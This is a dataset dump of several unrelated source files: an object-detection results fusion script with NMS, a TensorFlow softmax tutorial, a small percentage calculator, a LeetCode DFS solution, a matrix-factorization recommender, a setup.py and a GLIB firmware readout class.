start before \",len(rectange_list))\n if yichang:\n dis_woh=[i['bbox'][3]/(i['bbox'][2]+0.0000001) for i in rectange_list]\n dis_area=[i['bbox'][3]*i['bbox'][2] for i in rectange_list]\n u_woh=np.mean(dis_woh)\n std_woh=np.std(dis_woh)*segma_woh\n u_area=np.mean(dis_area)\n std_area=np.std(dis_area)*segma_area\n # print(\"fliter outlier before \",len(rectange_list))\n rectange_list=[i for i in rectange_list if (u_woh-std_wohup_bound)]\n rectange_list=[i for i in rectange_list if i['score'] >fliterscore]\n if test:\n print(\"fliter outlier after \",len(rectange_list))\n rectange_list=GetAnnotBoxLoc(AnotPath,rectange_list)\n if down_bound and down_fs:\n rectange_list=[i for i in rectange_list if (i['bbox'][1]>down_bound and i['score']>down_fs) or i['bbox'][1]1:\n new_score=float(1)\n i.update(category_id=1,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 1\" \n results1.append(i)\n elif i['category_id']==2 and i['image_id'] in selected2:\n new_score=i['score']*weight[0]\n if new_score>1:\n new_score=float(1)\n i.update(category_id=2,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 2\" \n results2.append(i)\n elif i['category_id']==3 and i['image_id'] in selected3:\n new_score=i['score']*weight[0]\n if new_score>1:\n new_score=float(1)\n i.update(category_id=3,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 3\" \n results3.append(i)\n elif i['category_id']==4 and i['image_id'] in selected4:\n new_score=i['score']*weight[0]\n if new_score>1:\n new_score=float(1)\n i.update(category_id=4,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 4\" \n results4.append(i)\n print(\"cid1\",len(results1),\"cid2\",len(results2),\"cid3\",len(results3),\"cid4\",len(results4))\n return results1,results2,results3,results4\n\ndef indexResults(reslist,annopath=\"\"):\n annopath=\"/root/data/gvision/dataset/raw_data/image_annos/person_bbox_test.json\"\n # print('Loading test annotation json file: {}'.format(annopath))\n with open(annopath, 'r') as load_f:\n anno= json.load(load_f)\n # print(\"bboxex_num\",len(reslist))#498\n indexedresults = defaultdict(list)\n # if test:\n # tempannos={}\n # imgfilters=imgfilters\n # if imgfilters:\n # # imgfilters=[\"15_24\"]\n # for imgfilter in imgfilters:\n # tempannos.update({i:j for i,j in anno.items() if imgfilter in i })\n # anno=tempannos\n def say(iss):\n filename, annodict=iss[0],iss[1]\n imageid = annodict['image id']\n for resdict in reslist:\n resimageid = resdict['image_id']\n if resimageid == imageid:\n indexedresults[imageid ].append(resdict)\n return indexedresults\n executor = ThreadPoolExecutor(max_workers=10)\n func_var = [[file_name,dict_value] for file_name,dict_value in anno.items()]\n pbar = tqdm(total=len(anno), ncols=50)\n for temp in executor.map(say,func_var):\n indexedresults.update(temp)\n pbar.update(1)\n pbar.close()\n results = indexedresults\n print(\"index bbox to self image\")\n return results \ndef GetAnnotBoxLoc(AnotPath,rectange_list):#AnotPath VOC标注文件路径\n tree = ET.ElementTree(file=AnotPath) #打开文件,解析成一棵树型结构\n root = tree.getroot()#获取树型结构的根\n ObjectSet=root.findall('object')#找到文件中所有含有object关键字的地方,这些地方含有标注目标\n backlist=[]\n # print(f\"forbid zone before {len(rectange_list)}\")\n \n for a in rectange_list:\n i=a[\"bbox\"]\n imageid=a[\"image_id\"]\n # print(imageid)\n left,up,right,down=i[0],i[1],i[0]+i[2],i[3]+i[1]\n templist=[]\n inter_xml=np.zeros(len(ObjectSet),dtype=float)\n for k,Object in 
def GetAnnotBoxLoc(AnotPath,rectange_list): # AnotPath: path of the VOC annotation file\n tree = ET.ElementTree(file=AnotPath) # open the file and parse it into a tree\n root = tree.getroot() # get the root of the tree\n ObjectSet=root.findall('object') # find every node containing the 'object' keyword; these hold the annotated targets\n backlist=[]\n # print(f\"forbid zone before {len(rectange_list)}\")\n \n for a in rectange_list:\n i=a[\"bbox\"]\n imageid=a[\"image_id\"]\n # print(imageid)\n left,up,right,down=i[0],i[1],i[0]+i[2],i[3]+i[1]\n templist=[]\n inter_xml=np.zeros(len(ObjectSet),dtype=float)\n for k,Object in enumerate(ObjectSet):\n BndBox=Object.find('bndbox')\n xmin= int(BndBox.find('xmin').text)#-1 # -1 would be needed because the program counts from 0\n ymin= int(BndBox.find('ymin').text)#-1\n xmax= int(BndBox.find('xmax').text)#-1\n ymax= int(BndBox.find('ymax').text)#-1\n templist.append({\n \"image_id\":imageid,\n \"category_id\":5,\n \"bbox\": [xmin,ymin,xmax-xmin,ymax-ymin],\n \"score\":0\n })\n\n if xmax <= left or right <= xmin or ymax <= up or down <= ymin:\n intersection = 0\n else:\n lens = min(xmax, right) - max(xmin, left)\n wide = min(ymax, down) - max(ymin, up)\n intersection = lens * wide\n # print(\"*\"*60,intersection)\n # print(i[2]*i[3])\n inter_xml[k]=intersection/(i[2]*i[3]+0.00001)\n if np.where(inter_xml<0.05)[0].shape[0]==len(ObjectSet): # i.e. no xml forbid zone intersects this bbox (ratio < threshold or == 0)\n backlist.append(a)\n # else:\n # print(np.where(inter_xml==0)[0].shape[0]==len(ObjectSet))\n # print(\"del\")\n # print(f\"forbid zone after {len(backlist)}\")\n return backlist#+templist#17_newzhongguan\n # return backlist,templist\n#\n
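\n# The merger below picks one suppression flavor per call. A rough sketch of the\n# per-detection layout (assumed from how objlist is built above, not from the nms docs):\n# det = [x, y, w, h, score, category_id]\n# keep = py_cpu_nms(np.array([det, ...]), iou_thresh) # indices of the surviving boxes\n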
def wnms(results,outpath,outfile,iouthresh,savejson=1,nmsname=\"nms\"):\n indexedresults=indexResults(results)\n mergedresults = defaultdict(list)\n for (imageid, objlist) in indexedresults.items():\n for objdict in objlist:\n mergedresults[imageid].append([objdict['bbox'][0],objdict['bbox'][1],objdict['bbox'][2],objdict['bbox'][3],objdict['score'], objdict['category_id']])\n objlist=mergedresults[imageid]\n # masxlist=[i[2]*i[3] for i in objlist]\n # max_wh=np.max(masxlist)\n # objlist=[[i[0],i[1],i[2],i[3],i[4]*0.05+i[3]*i[2]*0.95/max_wh,i[5],i[6]] for i in objlist ]\n if nmsname==\"softnms\":\n newdets,keep=soft_nms(np.array(objlist),iou_thr=iouthresh, method='gaussian',sigma=0.5, min_score=1e-3)#'gaussian''linear',\n # keep =py_cpu_softnms(np.array(objlist),thresh=nms_thresh, Nt=0.02, sigma=0.5, method=1)\n outdets = []\n for index in keep:\n outdets.append(objlist[index])\n mergedresults[imageid] = outdets\n elif nmsname==\"nms\":\n keep = py_cpu_nms(np.array(objlist),iouthresh)\n outdets = []\n for index in keep:\n outdets.append(objlist[index])\n mergedresults[imageid] = outdets\n elif nmsname==\"setnms\":\n keep=np.array(objlist)[set_cpu_nms(np.array(objlist), nms_thresh)].tolist()\n mergedresults[imageid] = keep\n elif nmsname==False:\n print(\"no nms\")\n else:\n raise ValueError('nmsname must be softnms or nms')\n savelist = []\n def say2(iss):\n imageid, objlist=iss[0],iss[1]\n templist=[]\n\n for obj in objlist:#obj [22528, 1270, 24576, 1, 1.0, 4]\n templist.append({\n \"image_id\": imageid,\n \"category_id\": obj[5],\n \"bbox\": obj[:4],\n # \"bbox\": tlbr2tlwh(obj[:4]),\n \"score\": obj[4]\n })\n if isfliter:\n if 391<=imageid<=420:#14otc\n templist=fliter(templist,fliterscore[\"14_OCT\"],AnotPath=\"/root/data/gvision/dataset/xml/14_OCT_Habour.xml\",\n segma_woh=3,segma_area=3,up_bound=4000,down_bound=None,down_fs=0.95,yichang=0)\n if 421<=imageid<=450:#15 nanshangongyuan\n templist=fliter(templist,fliterscore[\"15_nanshan\"],AnotPath=\"/root/data/gvision/dataset/xml/15_Nanshani_Park.xml\",\n segma_woh=3,segma_area=2,up_bound=1500,down_bound=7000,down_fs=None,yichang=0)\n if 451<=imageid<=465:#16xiaoxue----------01\n templist=fliter(templist,fliterscore[\"1601_shool\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_16_01_01.xml\",\n segma_woh=3,segma_area=3,up_bound=0,down_bound=None,down_fs=None,yichang=0)\n if 466<=imageid<=480:#16xiaoxue--------02\n templist=fliter(templist,fliterscore[\"1602_shool\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_16_25_02_.xml\",\n segma_woh=3,segma_area=3,up_bound=0,down_bound=None,down_fs=None,yichang=0)\n if 481<=imageid<=510:#17zhongguan\n templist=fliter(templist,fliterscore[\"17_newzhongguan\"],AnotPath=\"/root/data/gvision/dataset/xml/17_New_Zhongguan.xml\",\n segma_woh=3,segma_area=3,up_bound=6000,down_bound=7000,down_fs=None,yichang=0)\n if 511<=imageid<=540:#18xilin-------01\n templist=fliter(templist,fliterscore[\"1801_xilin\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_18_01_01.xml\",\n segma_woh=3,segma_area=3,up_bound=4000,down_bound=None,down_fs=None,yichang=0)\n if 541<=imageid<=555:#18xilin----------02\n templist=fliter(templist,fliterscore[\"1802_xilin\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_18_02.xml\",\n segma_woh=3,segma_area=3,up_bound=4000,down_bound=None,down_fs=None,yichang=0)\n if test:\n print(f\"del_inter after len {len(templist)}\")\n return templist\n executor = ThreadPoolExecutor(max_workers=80)\n func_var = [[file_name,dict_value] for file_name,dict_value in mergedresults.items()]\n print(\"fusion bbox into self'image start \")\n pbar2= tqdm(total=len(mergedresults), ncols=50)\n for temp in executor.map(say2,func_var):\n # print(temp)\n savelist+=temp\n pbar2.update(1)\n pbar2.close()\n # assert len(savelist)==0,f\"error{savelist} error\"\n if savejson:\n assert isinstance(savelist[0], dict),f\"the results must be dicts, not {savelist[0]}\" \n # if not isinstance(savelist[0], dict):\n # raise f\"the results must be dicts, not {savelist[0]}\" \n # print(savelist[0]['category_id'])\n outfile=outfile[:-5].replace(\"all\",f\"{savelist[1]['category_id']}\")+\".json\"\n with open(os.path.join(outpath, outfile), 'w') as f:\n dict_str = json.dumps(savelist, indent=2)\n f.write(dict_str)\n print(f\"save ***{len(savelist)} results*** json :{os.path.join(outpath, outfile)}\")\n return savelist\n \ndef model_fusion( outpath=\"/root/data/gvision/my_merge/fusion_results\",\n outfile=\"fafaxue_final_wnms_all.json\",model_num=4):\n results_all=[[],[],[],[]]\n a=[\"14\",\"15\",\"16\",\"17\",\"18\"]\n b=[\"15\",\"16\",\"17\"]\n no=[\"no\"]\n \"selected1, selected2, selected3, selected4 pick different scenes for different categories\"\n \n json_root=\"/root/data/gvision/final_merge/\"\n for idj,i in enumerate(zip(\n list(results_resolve(model_path=\"/root/data/gvision/final_merge/final6/det_results.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)),\n\n list(results_resolve(model_path=json_root+\"123/coco_results/detectors_reusme_fafaxue/detectors_reusme_delinter0isfliter1123datasetfafaxuesetnms0.6.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)),\n\n # list(results_resolve(model_path=json_root+\"bicle/coco_results/efficident_else/efficident_delinter0isfliter1bicledatasetelsesetnms0.6.json\",weight=[0.8,0.8,0.8,0.8],\n # selected1=no,selected2=no,selected3=no,selected4=b)),\n\n # list(results_resolve(model_path=json_root+\"bicle/coco_results/efficident_bigcar/efficident_delinter0isfliter1bicledatasetbigcarsetnms0.6.json\",weight=[0.8,0.8,0.8,0.8],\n # selected1=no,selected2=no,selected3=no,selected4=b)),\n\n\n list(results_resolve(model_path=json_root+\"head/coco_results/detectors_reusme_fafaxue/detectors_reusme_delinter0isfliter1headdatasetfafaxuenms0.6.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)),\n\n list(results_resolve(model_path=json_root+\"head/coco_results/m2retinaface_head.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)))):\n # for idj,i in enumerate(zip(\n # 
list(results_resolve(model_path=\"/root/data/gvision/my_merge/finalsubmission/fafafinal/det_results.json\",weight=[1,1,1,1])),\n # list(results_resolve(model_path=\"/root/data/gvision/my_merge/finalsubmission/final2/all.json\",weight=[0.3,0.3,0.3,0.3])),\n # )):\n a=[]\n for j in range(model_num): \n a+=i[j]\n results_all[idj]=a\n\n results1,results2,results3,results4=results_all[0],results_all[1],results_all[2],results_all[3]\n # print(results_all)\n # assert results1[0][\"category_id\"]==1,f'4 error {results1[0][\"category_id\"]}'\n # assert results2[0][\"category_id\"]==2,f'4 error {results2[0][\"category_id\"]}'\n assert results3[0][\"category_id\"]==3,f'4 error {results3[0][\"category_id\"]}'\n # assert results4[0][\"category_id\"]==4,f'4 error {results4[0][\"category_id\"]}'\n # assert type(results1[0][\"category_id\"])==int,f'4 error '\n # assert type(results2[0][\"category_id\"])==int,f'4 error '\n assert type(results3[0][\"category_id\"])==int,f'4 error '\n # assert type(results4[0][\"category_id\"])==int,f'4 error '\n\n\n # afternms_results1=wnms(results1,outpath,outfile=outfile,iouthresh=1,savejson=0,nmsname=\"softnms\")#\"softnms\")#\n\n # afternms_results2=wnms(results2,outpath,outfile=outfile,iouthresh=1,savejson=0,nmsname=\"softnms\")#\"softnms\")#\n\n afternms_results3=wnms(results3,outpath,outfile=outfile,iouthresh=0.3,savejson=1,nmsname=\"nms\")#\"nms\")#\n\n # afternms_results4=wnms(results4,outpath,outfile=outfile,iouthresh=1,savejson=0,nmsname=\"softnms\")#\"nms\")#\n\n # afternms_results_all=afternms_results1+afternms_results2+afternms_results3+afternms_results4\n # with open(os.path.join(outpath, outfile), 'w') as f:\n # dict_str = json.dumps(afternms_results_all, indent=2)\n # f.write(dict_str)\n # print(f\"save ***{len(afternms_results_all)} results*** json :{os.path.join(outpath, outfile)}\")\n\n\n\n\ndef main():\n global test,isdel_inter,isfliter,fliterscore\n fliterscore={\"14_OCT\":0,\"15_nanshan\":0,\"1601_shool\":0,\"1602_shool\":0,\"17_newzhongguan\":0,\"1801_xilin\":0,\"1802_xilin\":0}\n isfliter=1#fliter score xml\n isdel_inter=0\n test=0\n\n if test:\n outpath=\"/root/data/gvision/my_merge/fusion_results\"\n else:\n outpath=\"/root/data/gvision/final_merge/fusion_results\"\n model_fusion(outpath=outpath,\n outfile=\"fusion_headnms_all.json\")#must all\n\nif __name__ == \"__main__\":\n main()","sub_path":"my_tools/results_fusion3.py","file_name":"results_fusion3.py","file_ext":"py","file_size_in_byte":16492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"483261072","text":"import tensorflow as tf\n\n# 1. Data set used for training\nx_data = [[1, 2, 1],\n [1, 3, 2],\n [1, 3, 4],\n [1, 5, 5],\n [1, 7, 5],\n [1, 2, 5],\n [1, 6, 6],\n [1, 7, 7]]\ny_data = [[0, 0, 1],\n [0, 0, 1],\n [0, 0, 1],\n [0, 1, 0],\n [0, 1, 0],\n [0, 1, 0],\n [1, 0, 0],\n [1, 0, 0]]\n\n# Test data set\nx_test = [[2, 1, 1],\n [3, 1, 2],\n [3, 3, 4]]\ny_test = [[0, 0, 1],\n [0, 0, 1],\n [0, 0, 1]]\n\n# 2. X, Y placeholders for the tensors\nX = tf.placeholder(tf.float32, shape=[None, 3]) # 3 input features\nY = tf.placeholder(tf.float32, shape=[None, 3]) # 3 output classes\nnb_classes = 3\n\n# 3. Weights and bias\nW = tf.Variable(tf.random_normal([3, nb_classes]), name=\"weight\")\nb = tf.Variable(tf.random_normal([nb_classes]), name='bias')\n\n# 4. Hypothesis\n# softmax = exp(logits) / reduce_sum(exp(logits), dim)\nlogits = tf.matmul(X, W) + b\nhypothesis = tf.nn.softmax(logits)\n\n
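# Numerically, softmax exponentiates and normalizes. A hand-checked toy case\n# (made-up logits, not produced by this model):\n# softmax([2.0, 1.0, 0.1]) ~= [0.659, 0.242, 0.099]\n\n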
# 5. Cost function (it comes in several forms - cross entropy) - mind the parameters that get passed!!\n# Note that Y_one_hot must be a one-hot label vector made of a single 1 and several 0s.\n# Then the loss comes out per logit, and tf.reduce_mean over those gives the average loss for the whole batch.\ncost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(hypothesis), axis=1))\n#cost_i = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y_one_hot)\n#cost = tf.reduce_mean(cost_i) # average loss for the whole batch\n\n# Optimization\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=1e-1)\ntrain = optimizer.minimize(cost)\n\n# Accuracy computation\n# argmax(): the argmax of [0.1, 0.3, 0.5] is 2, the index of the largest value\nprediction = tf.argmax(hypothesis, 1) # returns the index holding the highest value\ncorrect_prediction = tf.equal(prediction, tf.argmax(Y, 1)) # check whether it matches the label\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, dtype=tf.float32))\n\n# Session\nwith tf.Session() as sess:\n # Initialize the variables\n sess.run(tf.global_variables_initializer())\n\n # Training\n for step in range(201):\n # Train using only the training data\n cost_val, W_val, acc, _ = sess.run([cost, W, accuracy, train], feed_dict={X:x_data, Y:y_data})\n\n #print(\"Step: {:5}\\tCost: {:.3f}\\tWeight: {:.3f}\\tAcc: {:.2%}\".format(step, cost_val, W_val, acc))\n print(step, cost_val, W_val, acc)\n\n # Prediction - uses only the test data\n print(\"Prediction:\", sess.run(prediction, feed_dict={X: x_test}))\n # Compute the accuracy\n print(\"Accuracy: \", sess.run(accuracy, feed_dict={X: x_test, Y: y_test}))","sub_path":"DeepLearningZeroToAll/ch07/learning_rate_eval.py","file_name":"learning_rate_eval.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"570661899","text":"# Author: Oscar Macias Rodríguez, A01376398\r\n# Computes the percentage of men and women enrolled in a class\r\n\r\n\r\nm = int(input(\"Women enrolled:\"))\r\nh = int(input(\"Men enrolled:\"))\r\ntotal = m+h\r\np1 = m*100/total\r\np2 = h*100/total\r\n\r\nprint(\"Total enrolled:\", total)\r\nprint(\"Percentage of women:\", \"%.1f\" % p1)\r\nprint(\"Percentage of men:\", \"%.1f\" % p2)","sub_path":"Porcentajes.py","file_name":"Porcentajes.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"340135703","text":"class Solution(object):\n def pacificAtlantic(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n if not matrix: return []\n self.directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n m = len(matrix)\n n = len(matrix[0])\n toP = [[False for _ in range(n)] for _ in range(m)]\n\n toA = [[False for _ in range(n)] for _ in range(m)]\n result = []\n # visit back-ward: from edge to other nodes\n for i in range(m):\n # toP[i][0] = True\n # toA[i][n-1] = True\n self.dfs(matrix, i, 0, toP, m, n)\n self.dfs(matrix, i, n - 1, toA, m, n)\n for j in range(n):\n # toP[0][j] = True\n # toA[m-1][j] = True\n self.dfs(matrix, 0, j, toP, m, n)\n self.dfs(matrix, m - 1, j, toA, m, n)\n\n for i in range(m):\n for j in range(n):\n if toP[i][j] and toA[i][j]:\n result.append([i, j])\n return result\n\n def dfs(self, matrix, i, j, visited, m, n):\n # when dfs called, meaning its caller already verified this point\n visited[i][j] = True\n for dir in self.directions:\n x, y = i + dir[0], j + dir[1]\n if x < 0 or x >= m or y < 0 or y >= n or visited[x][y] or matrix[x][y] < matrix[i][j]:\n continue\n self.dfs(matrix, x, y, visited, m, 
n)","sub_path":"417_pacific_atlantic_water_flow/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"57027272","text":"# coding=utf-8\n\nimport pandas as pd\nimport numpy as np\nimport math\nimport random\n\n'''\nnearly done\n'''\n\nusers = 943 # 1-943\nitems = 1682 # 1-1682\n\ndef load_data():\n\n train = {}\n test = {}\n train_file = 'ml-100k/ua.base'\n test_file = 'ml-100k/ua.test'\n\n for line in open(train_file):\n u, i, r, t = map(int, line.strip().split())\n train.setdefault(u,{})\n train[u][i] = float(r)\n\n for line in open(test_file):\n u, i, r, t = map(int, line.strip().split())\n test.setdefault(u,{})\n test[u][i] = float(r)\n\n return train, test\n\ndef init_parameters(train, cap_K):\n P = {}\n Q = {}\n weight = 1. / np.sqrt(cap_K)\n for u in train:\n for i in train[u]:\n if u not in P:\n P[u] = np.random.rand(1, cap_K) * weight\n if i not in Q:\n Q[i] = np.random.rand(1, cap_K) * weight\n return P, Q\n\ndef predict(p, q):\n r_hat = np.dot(p, q.T)\n return r_hat\n\ndef rmse(errors):\n errors = np.array(errors)\n return np.sqrt(np.mean(np.power(errors, 2)))\n\ndef get_rmse(data, P, Q):\n error_sum = 0\n count = 0.\n for u in data:\n for i in data[u]:\n if u in P and i in Q:\n r_hat = predict(P[u], Q[i])\n error_sum += (data[u][i] - r_hat)**2\n count += 1.\n rmse = math.sqrt(error_sum / count)\n return rmse\n\ndef LFM(steps, alpha, lamda, cap_K):\n train, test = load_data()\n P, Q = init_parameters(train, cap_K)\n for index in range(steps):\n errors = []\n for u in train:\n for i in train[u]:\n r_hat = predict(P[u], Q[i])\n error = train[u][i] - r_hat\n P[u] += alpha * (error * Q[i] - lamda * P[u])\n Q[i] += alpha * (error * P[u] - lamda * Q[i])\n errors.append(error)\n train_rmse = rmse(errors)\n test_rmse = get_rmse(test, P, Q)\n print(index, 'train_RMSE =', train_rmse, '><', 'test_RMSE =', test_rmse)\n\n\n\nif __name__ == '__main__':\n steps = 100\n alpha = 0.01\n lamda = 0.1\n cap_K = 10\n LFM(steps, alpha, lamda, cap_K)","sub_path":"rec_LFM.py","file_name":"rec_LFM.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"47525626","text":"import os\nfrom setuptools import setup, find_packages\n\ndescription_file = os.path.join(os.path.dirname(__file__), 'README.md')\nwith open(description_file) as fh:\n DESCRIPTION = fh.read()\n\n\nif __name__ == '__main__':\n setup(name='datasets',\n version='0.0.1',\n author='Patricio Cerda',\n author_email='patricio.cerda@inria.fr',\n description=(\"Datasets for prediction with string categorical variables\"),\n long_description=DESCRIPTION,\n license='BSD',\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries',\n ],\n platforms='any',\n packages=find_packages(),\n install_requires=['pandas', 'requests'],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"247503399","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Glib (and FW) representation.\"\"\"\r\n\r\n\r\n\r\nfrom copy import deepcopy\r\nimport 
datetime\r\nimport numpy as np\r\nimport os\r\nimport time\r\nimport xml.etree.ElementTree as et\r\nimport yaml\r\n\r\nfrom .. import util\r\nfrom . import cbc2\r\n\r\n\r\n\r\n# event dtype for an fw cbc2 event\r\nevents_dtype = np.dtype([\r\n ('bunch', ' broken_word_in_events)]\r\n\r\n if mask:\r\n mask = np.ones(no_events, dtype=np.bool)\r\n mask[really_broken_events] = False\r\n return really_broken_events, mask\r\n\r\n else:\r\n return really_broken_events\r\n\r\n\r\n def collect(self, **kwargs):\r\n\r\n overall_no_events = kwargs.get('no_events', 100)\r\n dataset = kwargs.get('dataset', False)\r\n index = kwargs.get('index', False)\r\n mode = kwargs.get('mode', 'safe')\r\n\r\n # trigger ? select if internal or external trigger should be used\r\n\r\n # consider maximum sram capacity\r\n blocksize = (4*9+6) # no words for 2cbc2 event\r\n max_no_events = int(2000000/blocksize)-3 # 47616\r\n\r\n # check if mode is known\r\n if mode not in ['lossy', 'safe', 'unsafe']:\r\n raise Exception('unknown event collection mode: '+str(mode))\r\n\r\n # if dataset and index has been given (when data for the complete \"collection\" will not fit in the memory)\r\n if dataset and index:\r\n persistance = True\r\n else:\r\n persistance = False\r\n cache = [] # buffer for all events\r\n\r\n # choose sram readout safety\r\n if mode in ['lossy', 'unsafe']:\r\n safe = False\r\n else:\r\n safe = True\r\n\r\n # choose readout strategy based on mode\r\n if mode == 'lossy':\r\n no_events_read = 0\r\n\r\n # need a flexible loop to compensate lossy readout\r\n while no_events_read < overall_no_events:\r\n\r\n no_events_rest = overall_no_events - no_events_read\r\n\r\n if no_events_rest >= max_no_events:\r\n # collect as many events as are possible\r\n next_no_events = max_no_events\r\n\r\n else:\r\n # collect residual events\r\n next_no_events = no_events_rest\r\n\r\n # try to forecast how many events are lost and collect sufficient enough\r\n if next_no_events > 255/blocksize:\r\n new_next_no_events = next_no_events\r\n last_next_no_events = 0\r\n while True:\r\n broken_events = self.__find_broken_events(new_next_no_events, blocksize)\r\n new_next_no_events = next_no_events+broken_events.size\r\n\r\n # stop if more than max_no_events need to be catched\r\n if new_next_no_events >= max_no_events:\r\n next_no_events = max_no_events\r\n break\r\n # or if no additional bad events 'created' by incorporating new ones\r\n elif new_next_no_events == last_next_no_events:\r\n next_no_events = new_next_no_events\r\n break\r\n # otherwise save current guestimation for next iteration\r\n else:\r\n last_next_no_events = new_next_no_events\r\n\r\n events = self.__collect_events(next_no_events, blocksize, safe)\r\n\r\n # remove broken events\r\n if events.size > 255/blocksize:\r\n broken_events_idxs, broken_events_mask = self.__find_broken_events(events.size, blocksize, mask=True)\r\n events = events[broken_events_mask]\r\n\r\n if persistance:\r\n dataset[index + np.index_exp[no_events_read:no_events_read+events.size]] = events\r\n else:\r\n cache.append(events)\r\n\r\n print(overall_no_events, no_events_read, events.size)\r\n\r\n no_events_read += events.size\r\n\r\n elif mode in ['safe', 'unsafe']:\r\n\r\n # main loop of daq\r\n for i, offset in enumerate(range(0, overall_no_events, max_no_events)):\r\n\r\n # calculate how many events should be read in this iteration\r\n if overall_no_events - offset >= max_no_events:\r\n next_no_events = max_no_events\r\n else:\r\n next_no_events = overall_no_events - offset\r\n\r\n events = 
self.__collect_events(next_no_events, blocksize, safe)\r\n\r\n print(offset, overall_no_events, next_no_events, max_no_events, next_no_events*blocksize)\r\n\r\n if persistance:\r\n dataset[index + np.index_exp[offset:offset+next_no_events]] = events\r\n else:\r\n cache.append(events)\r\n\r\n\r\n if not persistance:\r\n return np.concatenate(cache)\r\n\r\n\r\n def list_registers(self):\r\n\r\n return(sorted(self.__uhal_device.getNodes()))\r\n\r\n\r\n def register_info(self, name):\r\n\r\n node = self.__uhal_device.getNode(name)\r\n register = node.read()\r\n self.__uhal_device.dispatch()\r\n print(name,\r\n node.getAddress(),\r\n node.getMask(),\r\n node.getMode(),\r\n node.getPermission(),\r\n node.getSize(),\r\n node.getTags(),\r\n node.getParameters(),\r\n register)\r\n\r\n\r\n def read_sram_blocks(self, name, no_words, debug=False, safe=True):\r\n\r\n # print('read_sram_blocks: safe=>', safe)\r\n if safe:\r\n blocks_read = self.__uhal_device.getNode(name).readBlock(no_words)\r\n self.__uhal_device.dispatch()\r\n blocks_read = np.asarray(blocks_read).copy()\r\n # try to fix the brocken ones\r\n if len(blocks_read) > 255:\r\n broken_words = np.concatenate(((255, ), np.arange(255+347, no_words, 347)))\r\n for block in np.split(broken_words, np.arange(0, broken_words.size, 255)):\r\n new_words = []\r\n for i in block:\r\n new_words.append((i, self.__uhal_device.getNode(name).readBlockOffset(2, int(i-1))))\r\n self.__uhal_device.dispatch()\r\n for i, word in new_words:\r\n blocks_read[i] = word[1]\r\n return blocks_read\r\n else:\r\n blocks_read = self.__uhal_device.getNode(name).readBlock(no_words)\r\n self.__uhal_device.dispatch()\r\n return np.asarray(blocks_read).copy()\r\n\r\n\r\n def read_multiple_registers(self, names):\r\n values = []\r\n for name in names:\r\n values.append(self.read_register(name))\r\n return values\r\n def read_register(self, name):\r\n reg = self.__uhal_device.getNode(name).read()\r\n self.__uhal_device.dispatch()\r\n return(reg.value())\r\n def write_multiple_registers(self, registers):\r\n for name, value in registers:\r\n self.__uhal_device.getNode(name).write(value)\r\n self.__uhal_device.dispatch()\r\n def write_register(self, name, value):\r\n self.__uhal_device.getNode(name).write(value)\r\n self.__uhal_device.dispatch()\r\n def write_sram_blocks(self, name, blocks, debug=False, safe=True):\r\n size = len(blocks)\r\n if debug:\r\n blocks_read = []\r\n # print('trying to write: '+str(size))\r\n if safe:\r\n # chop transaction into pieces of 255 words, to circumvent the fw 256 bug\r\n for offset in range(0, size, 255):\r\n if size - offset >= 255:\r\n length = 255\r\n else:\r\n length = size - offset\r\n # print('wrote length '+str(length))\r\n blocks_write = blocks[offset:offset+length]\r\n self.__uhal_device.getNode(name).writeBlockOffset(blocks_write, offset)\r\n self.__uhal_device.dispatch()\r\n\r\n if debug:\r\n blocks_255 = self.__uhal_device.getNode(name).readBlockOffset(length, offset)\r\n self.__uhal_device.dispatch()\r\n blocks_read.extend(np.asarray(blocks_255).copy())\r\n else:\r\n self.__uhal_device.getNode(name).writeBlock(blocks)\r\n self.__uhal_device.dispatch()\r\n if debug:\r\n blocks_read = self.__uhal_device.getNode(name).readBlock(size)\r\n self.__uhal_device.dispatch()\r\n blocks_read = np.asarray(blocks_read).copy()\r\n\r\n if debug:\r\n if not safe:\r\n print('debug used when not safe')\r\n if len(blocks)!= len(blocks_read):\r\n raise Exception('blocks written ('+str(len(blocks))+') and read back ('+str(len(blocks_read))+') do not 
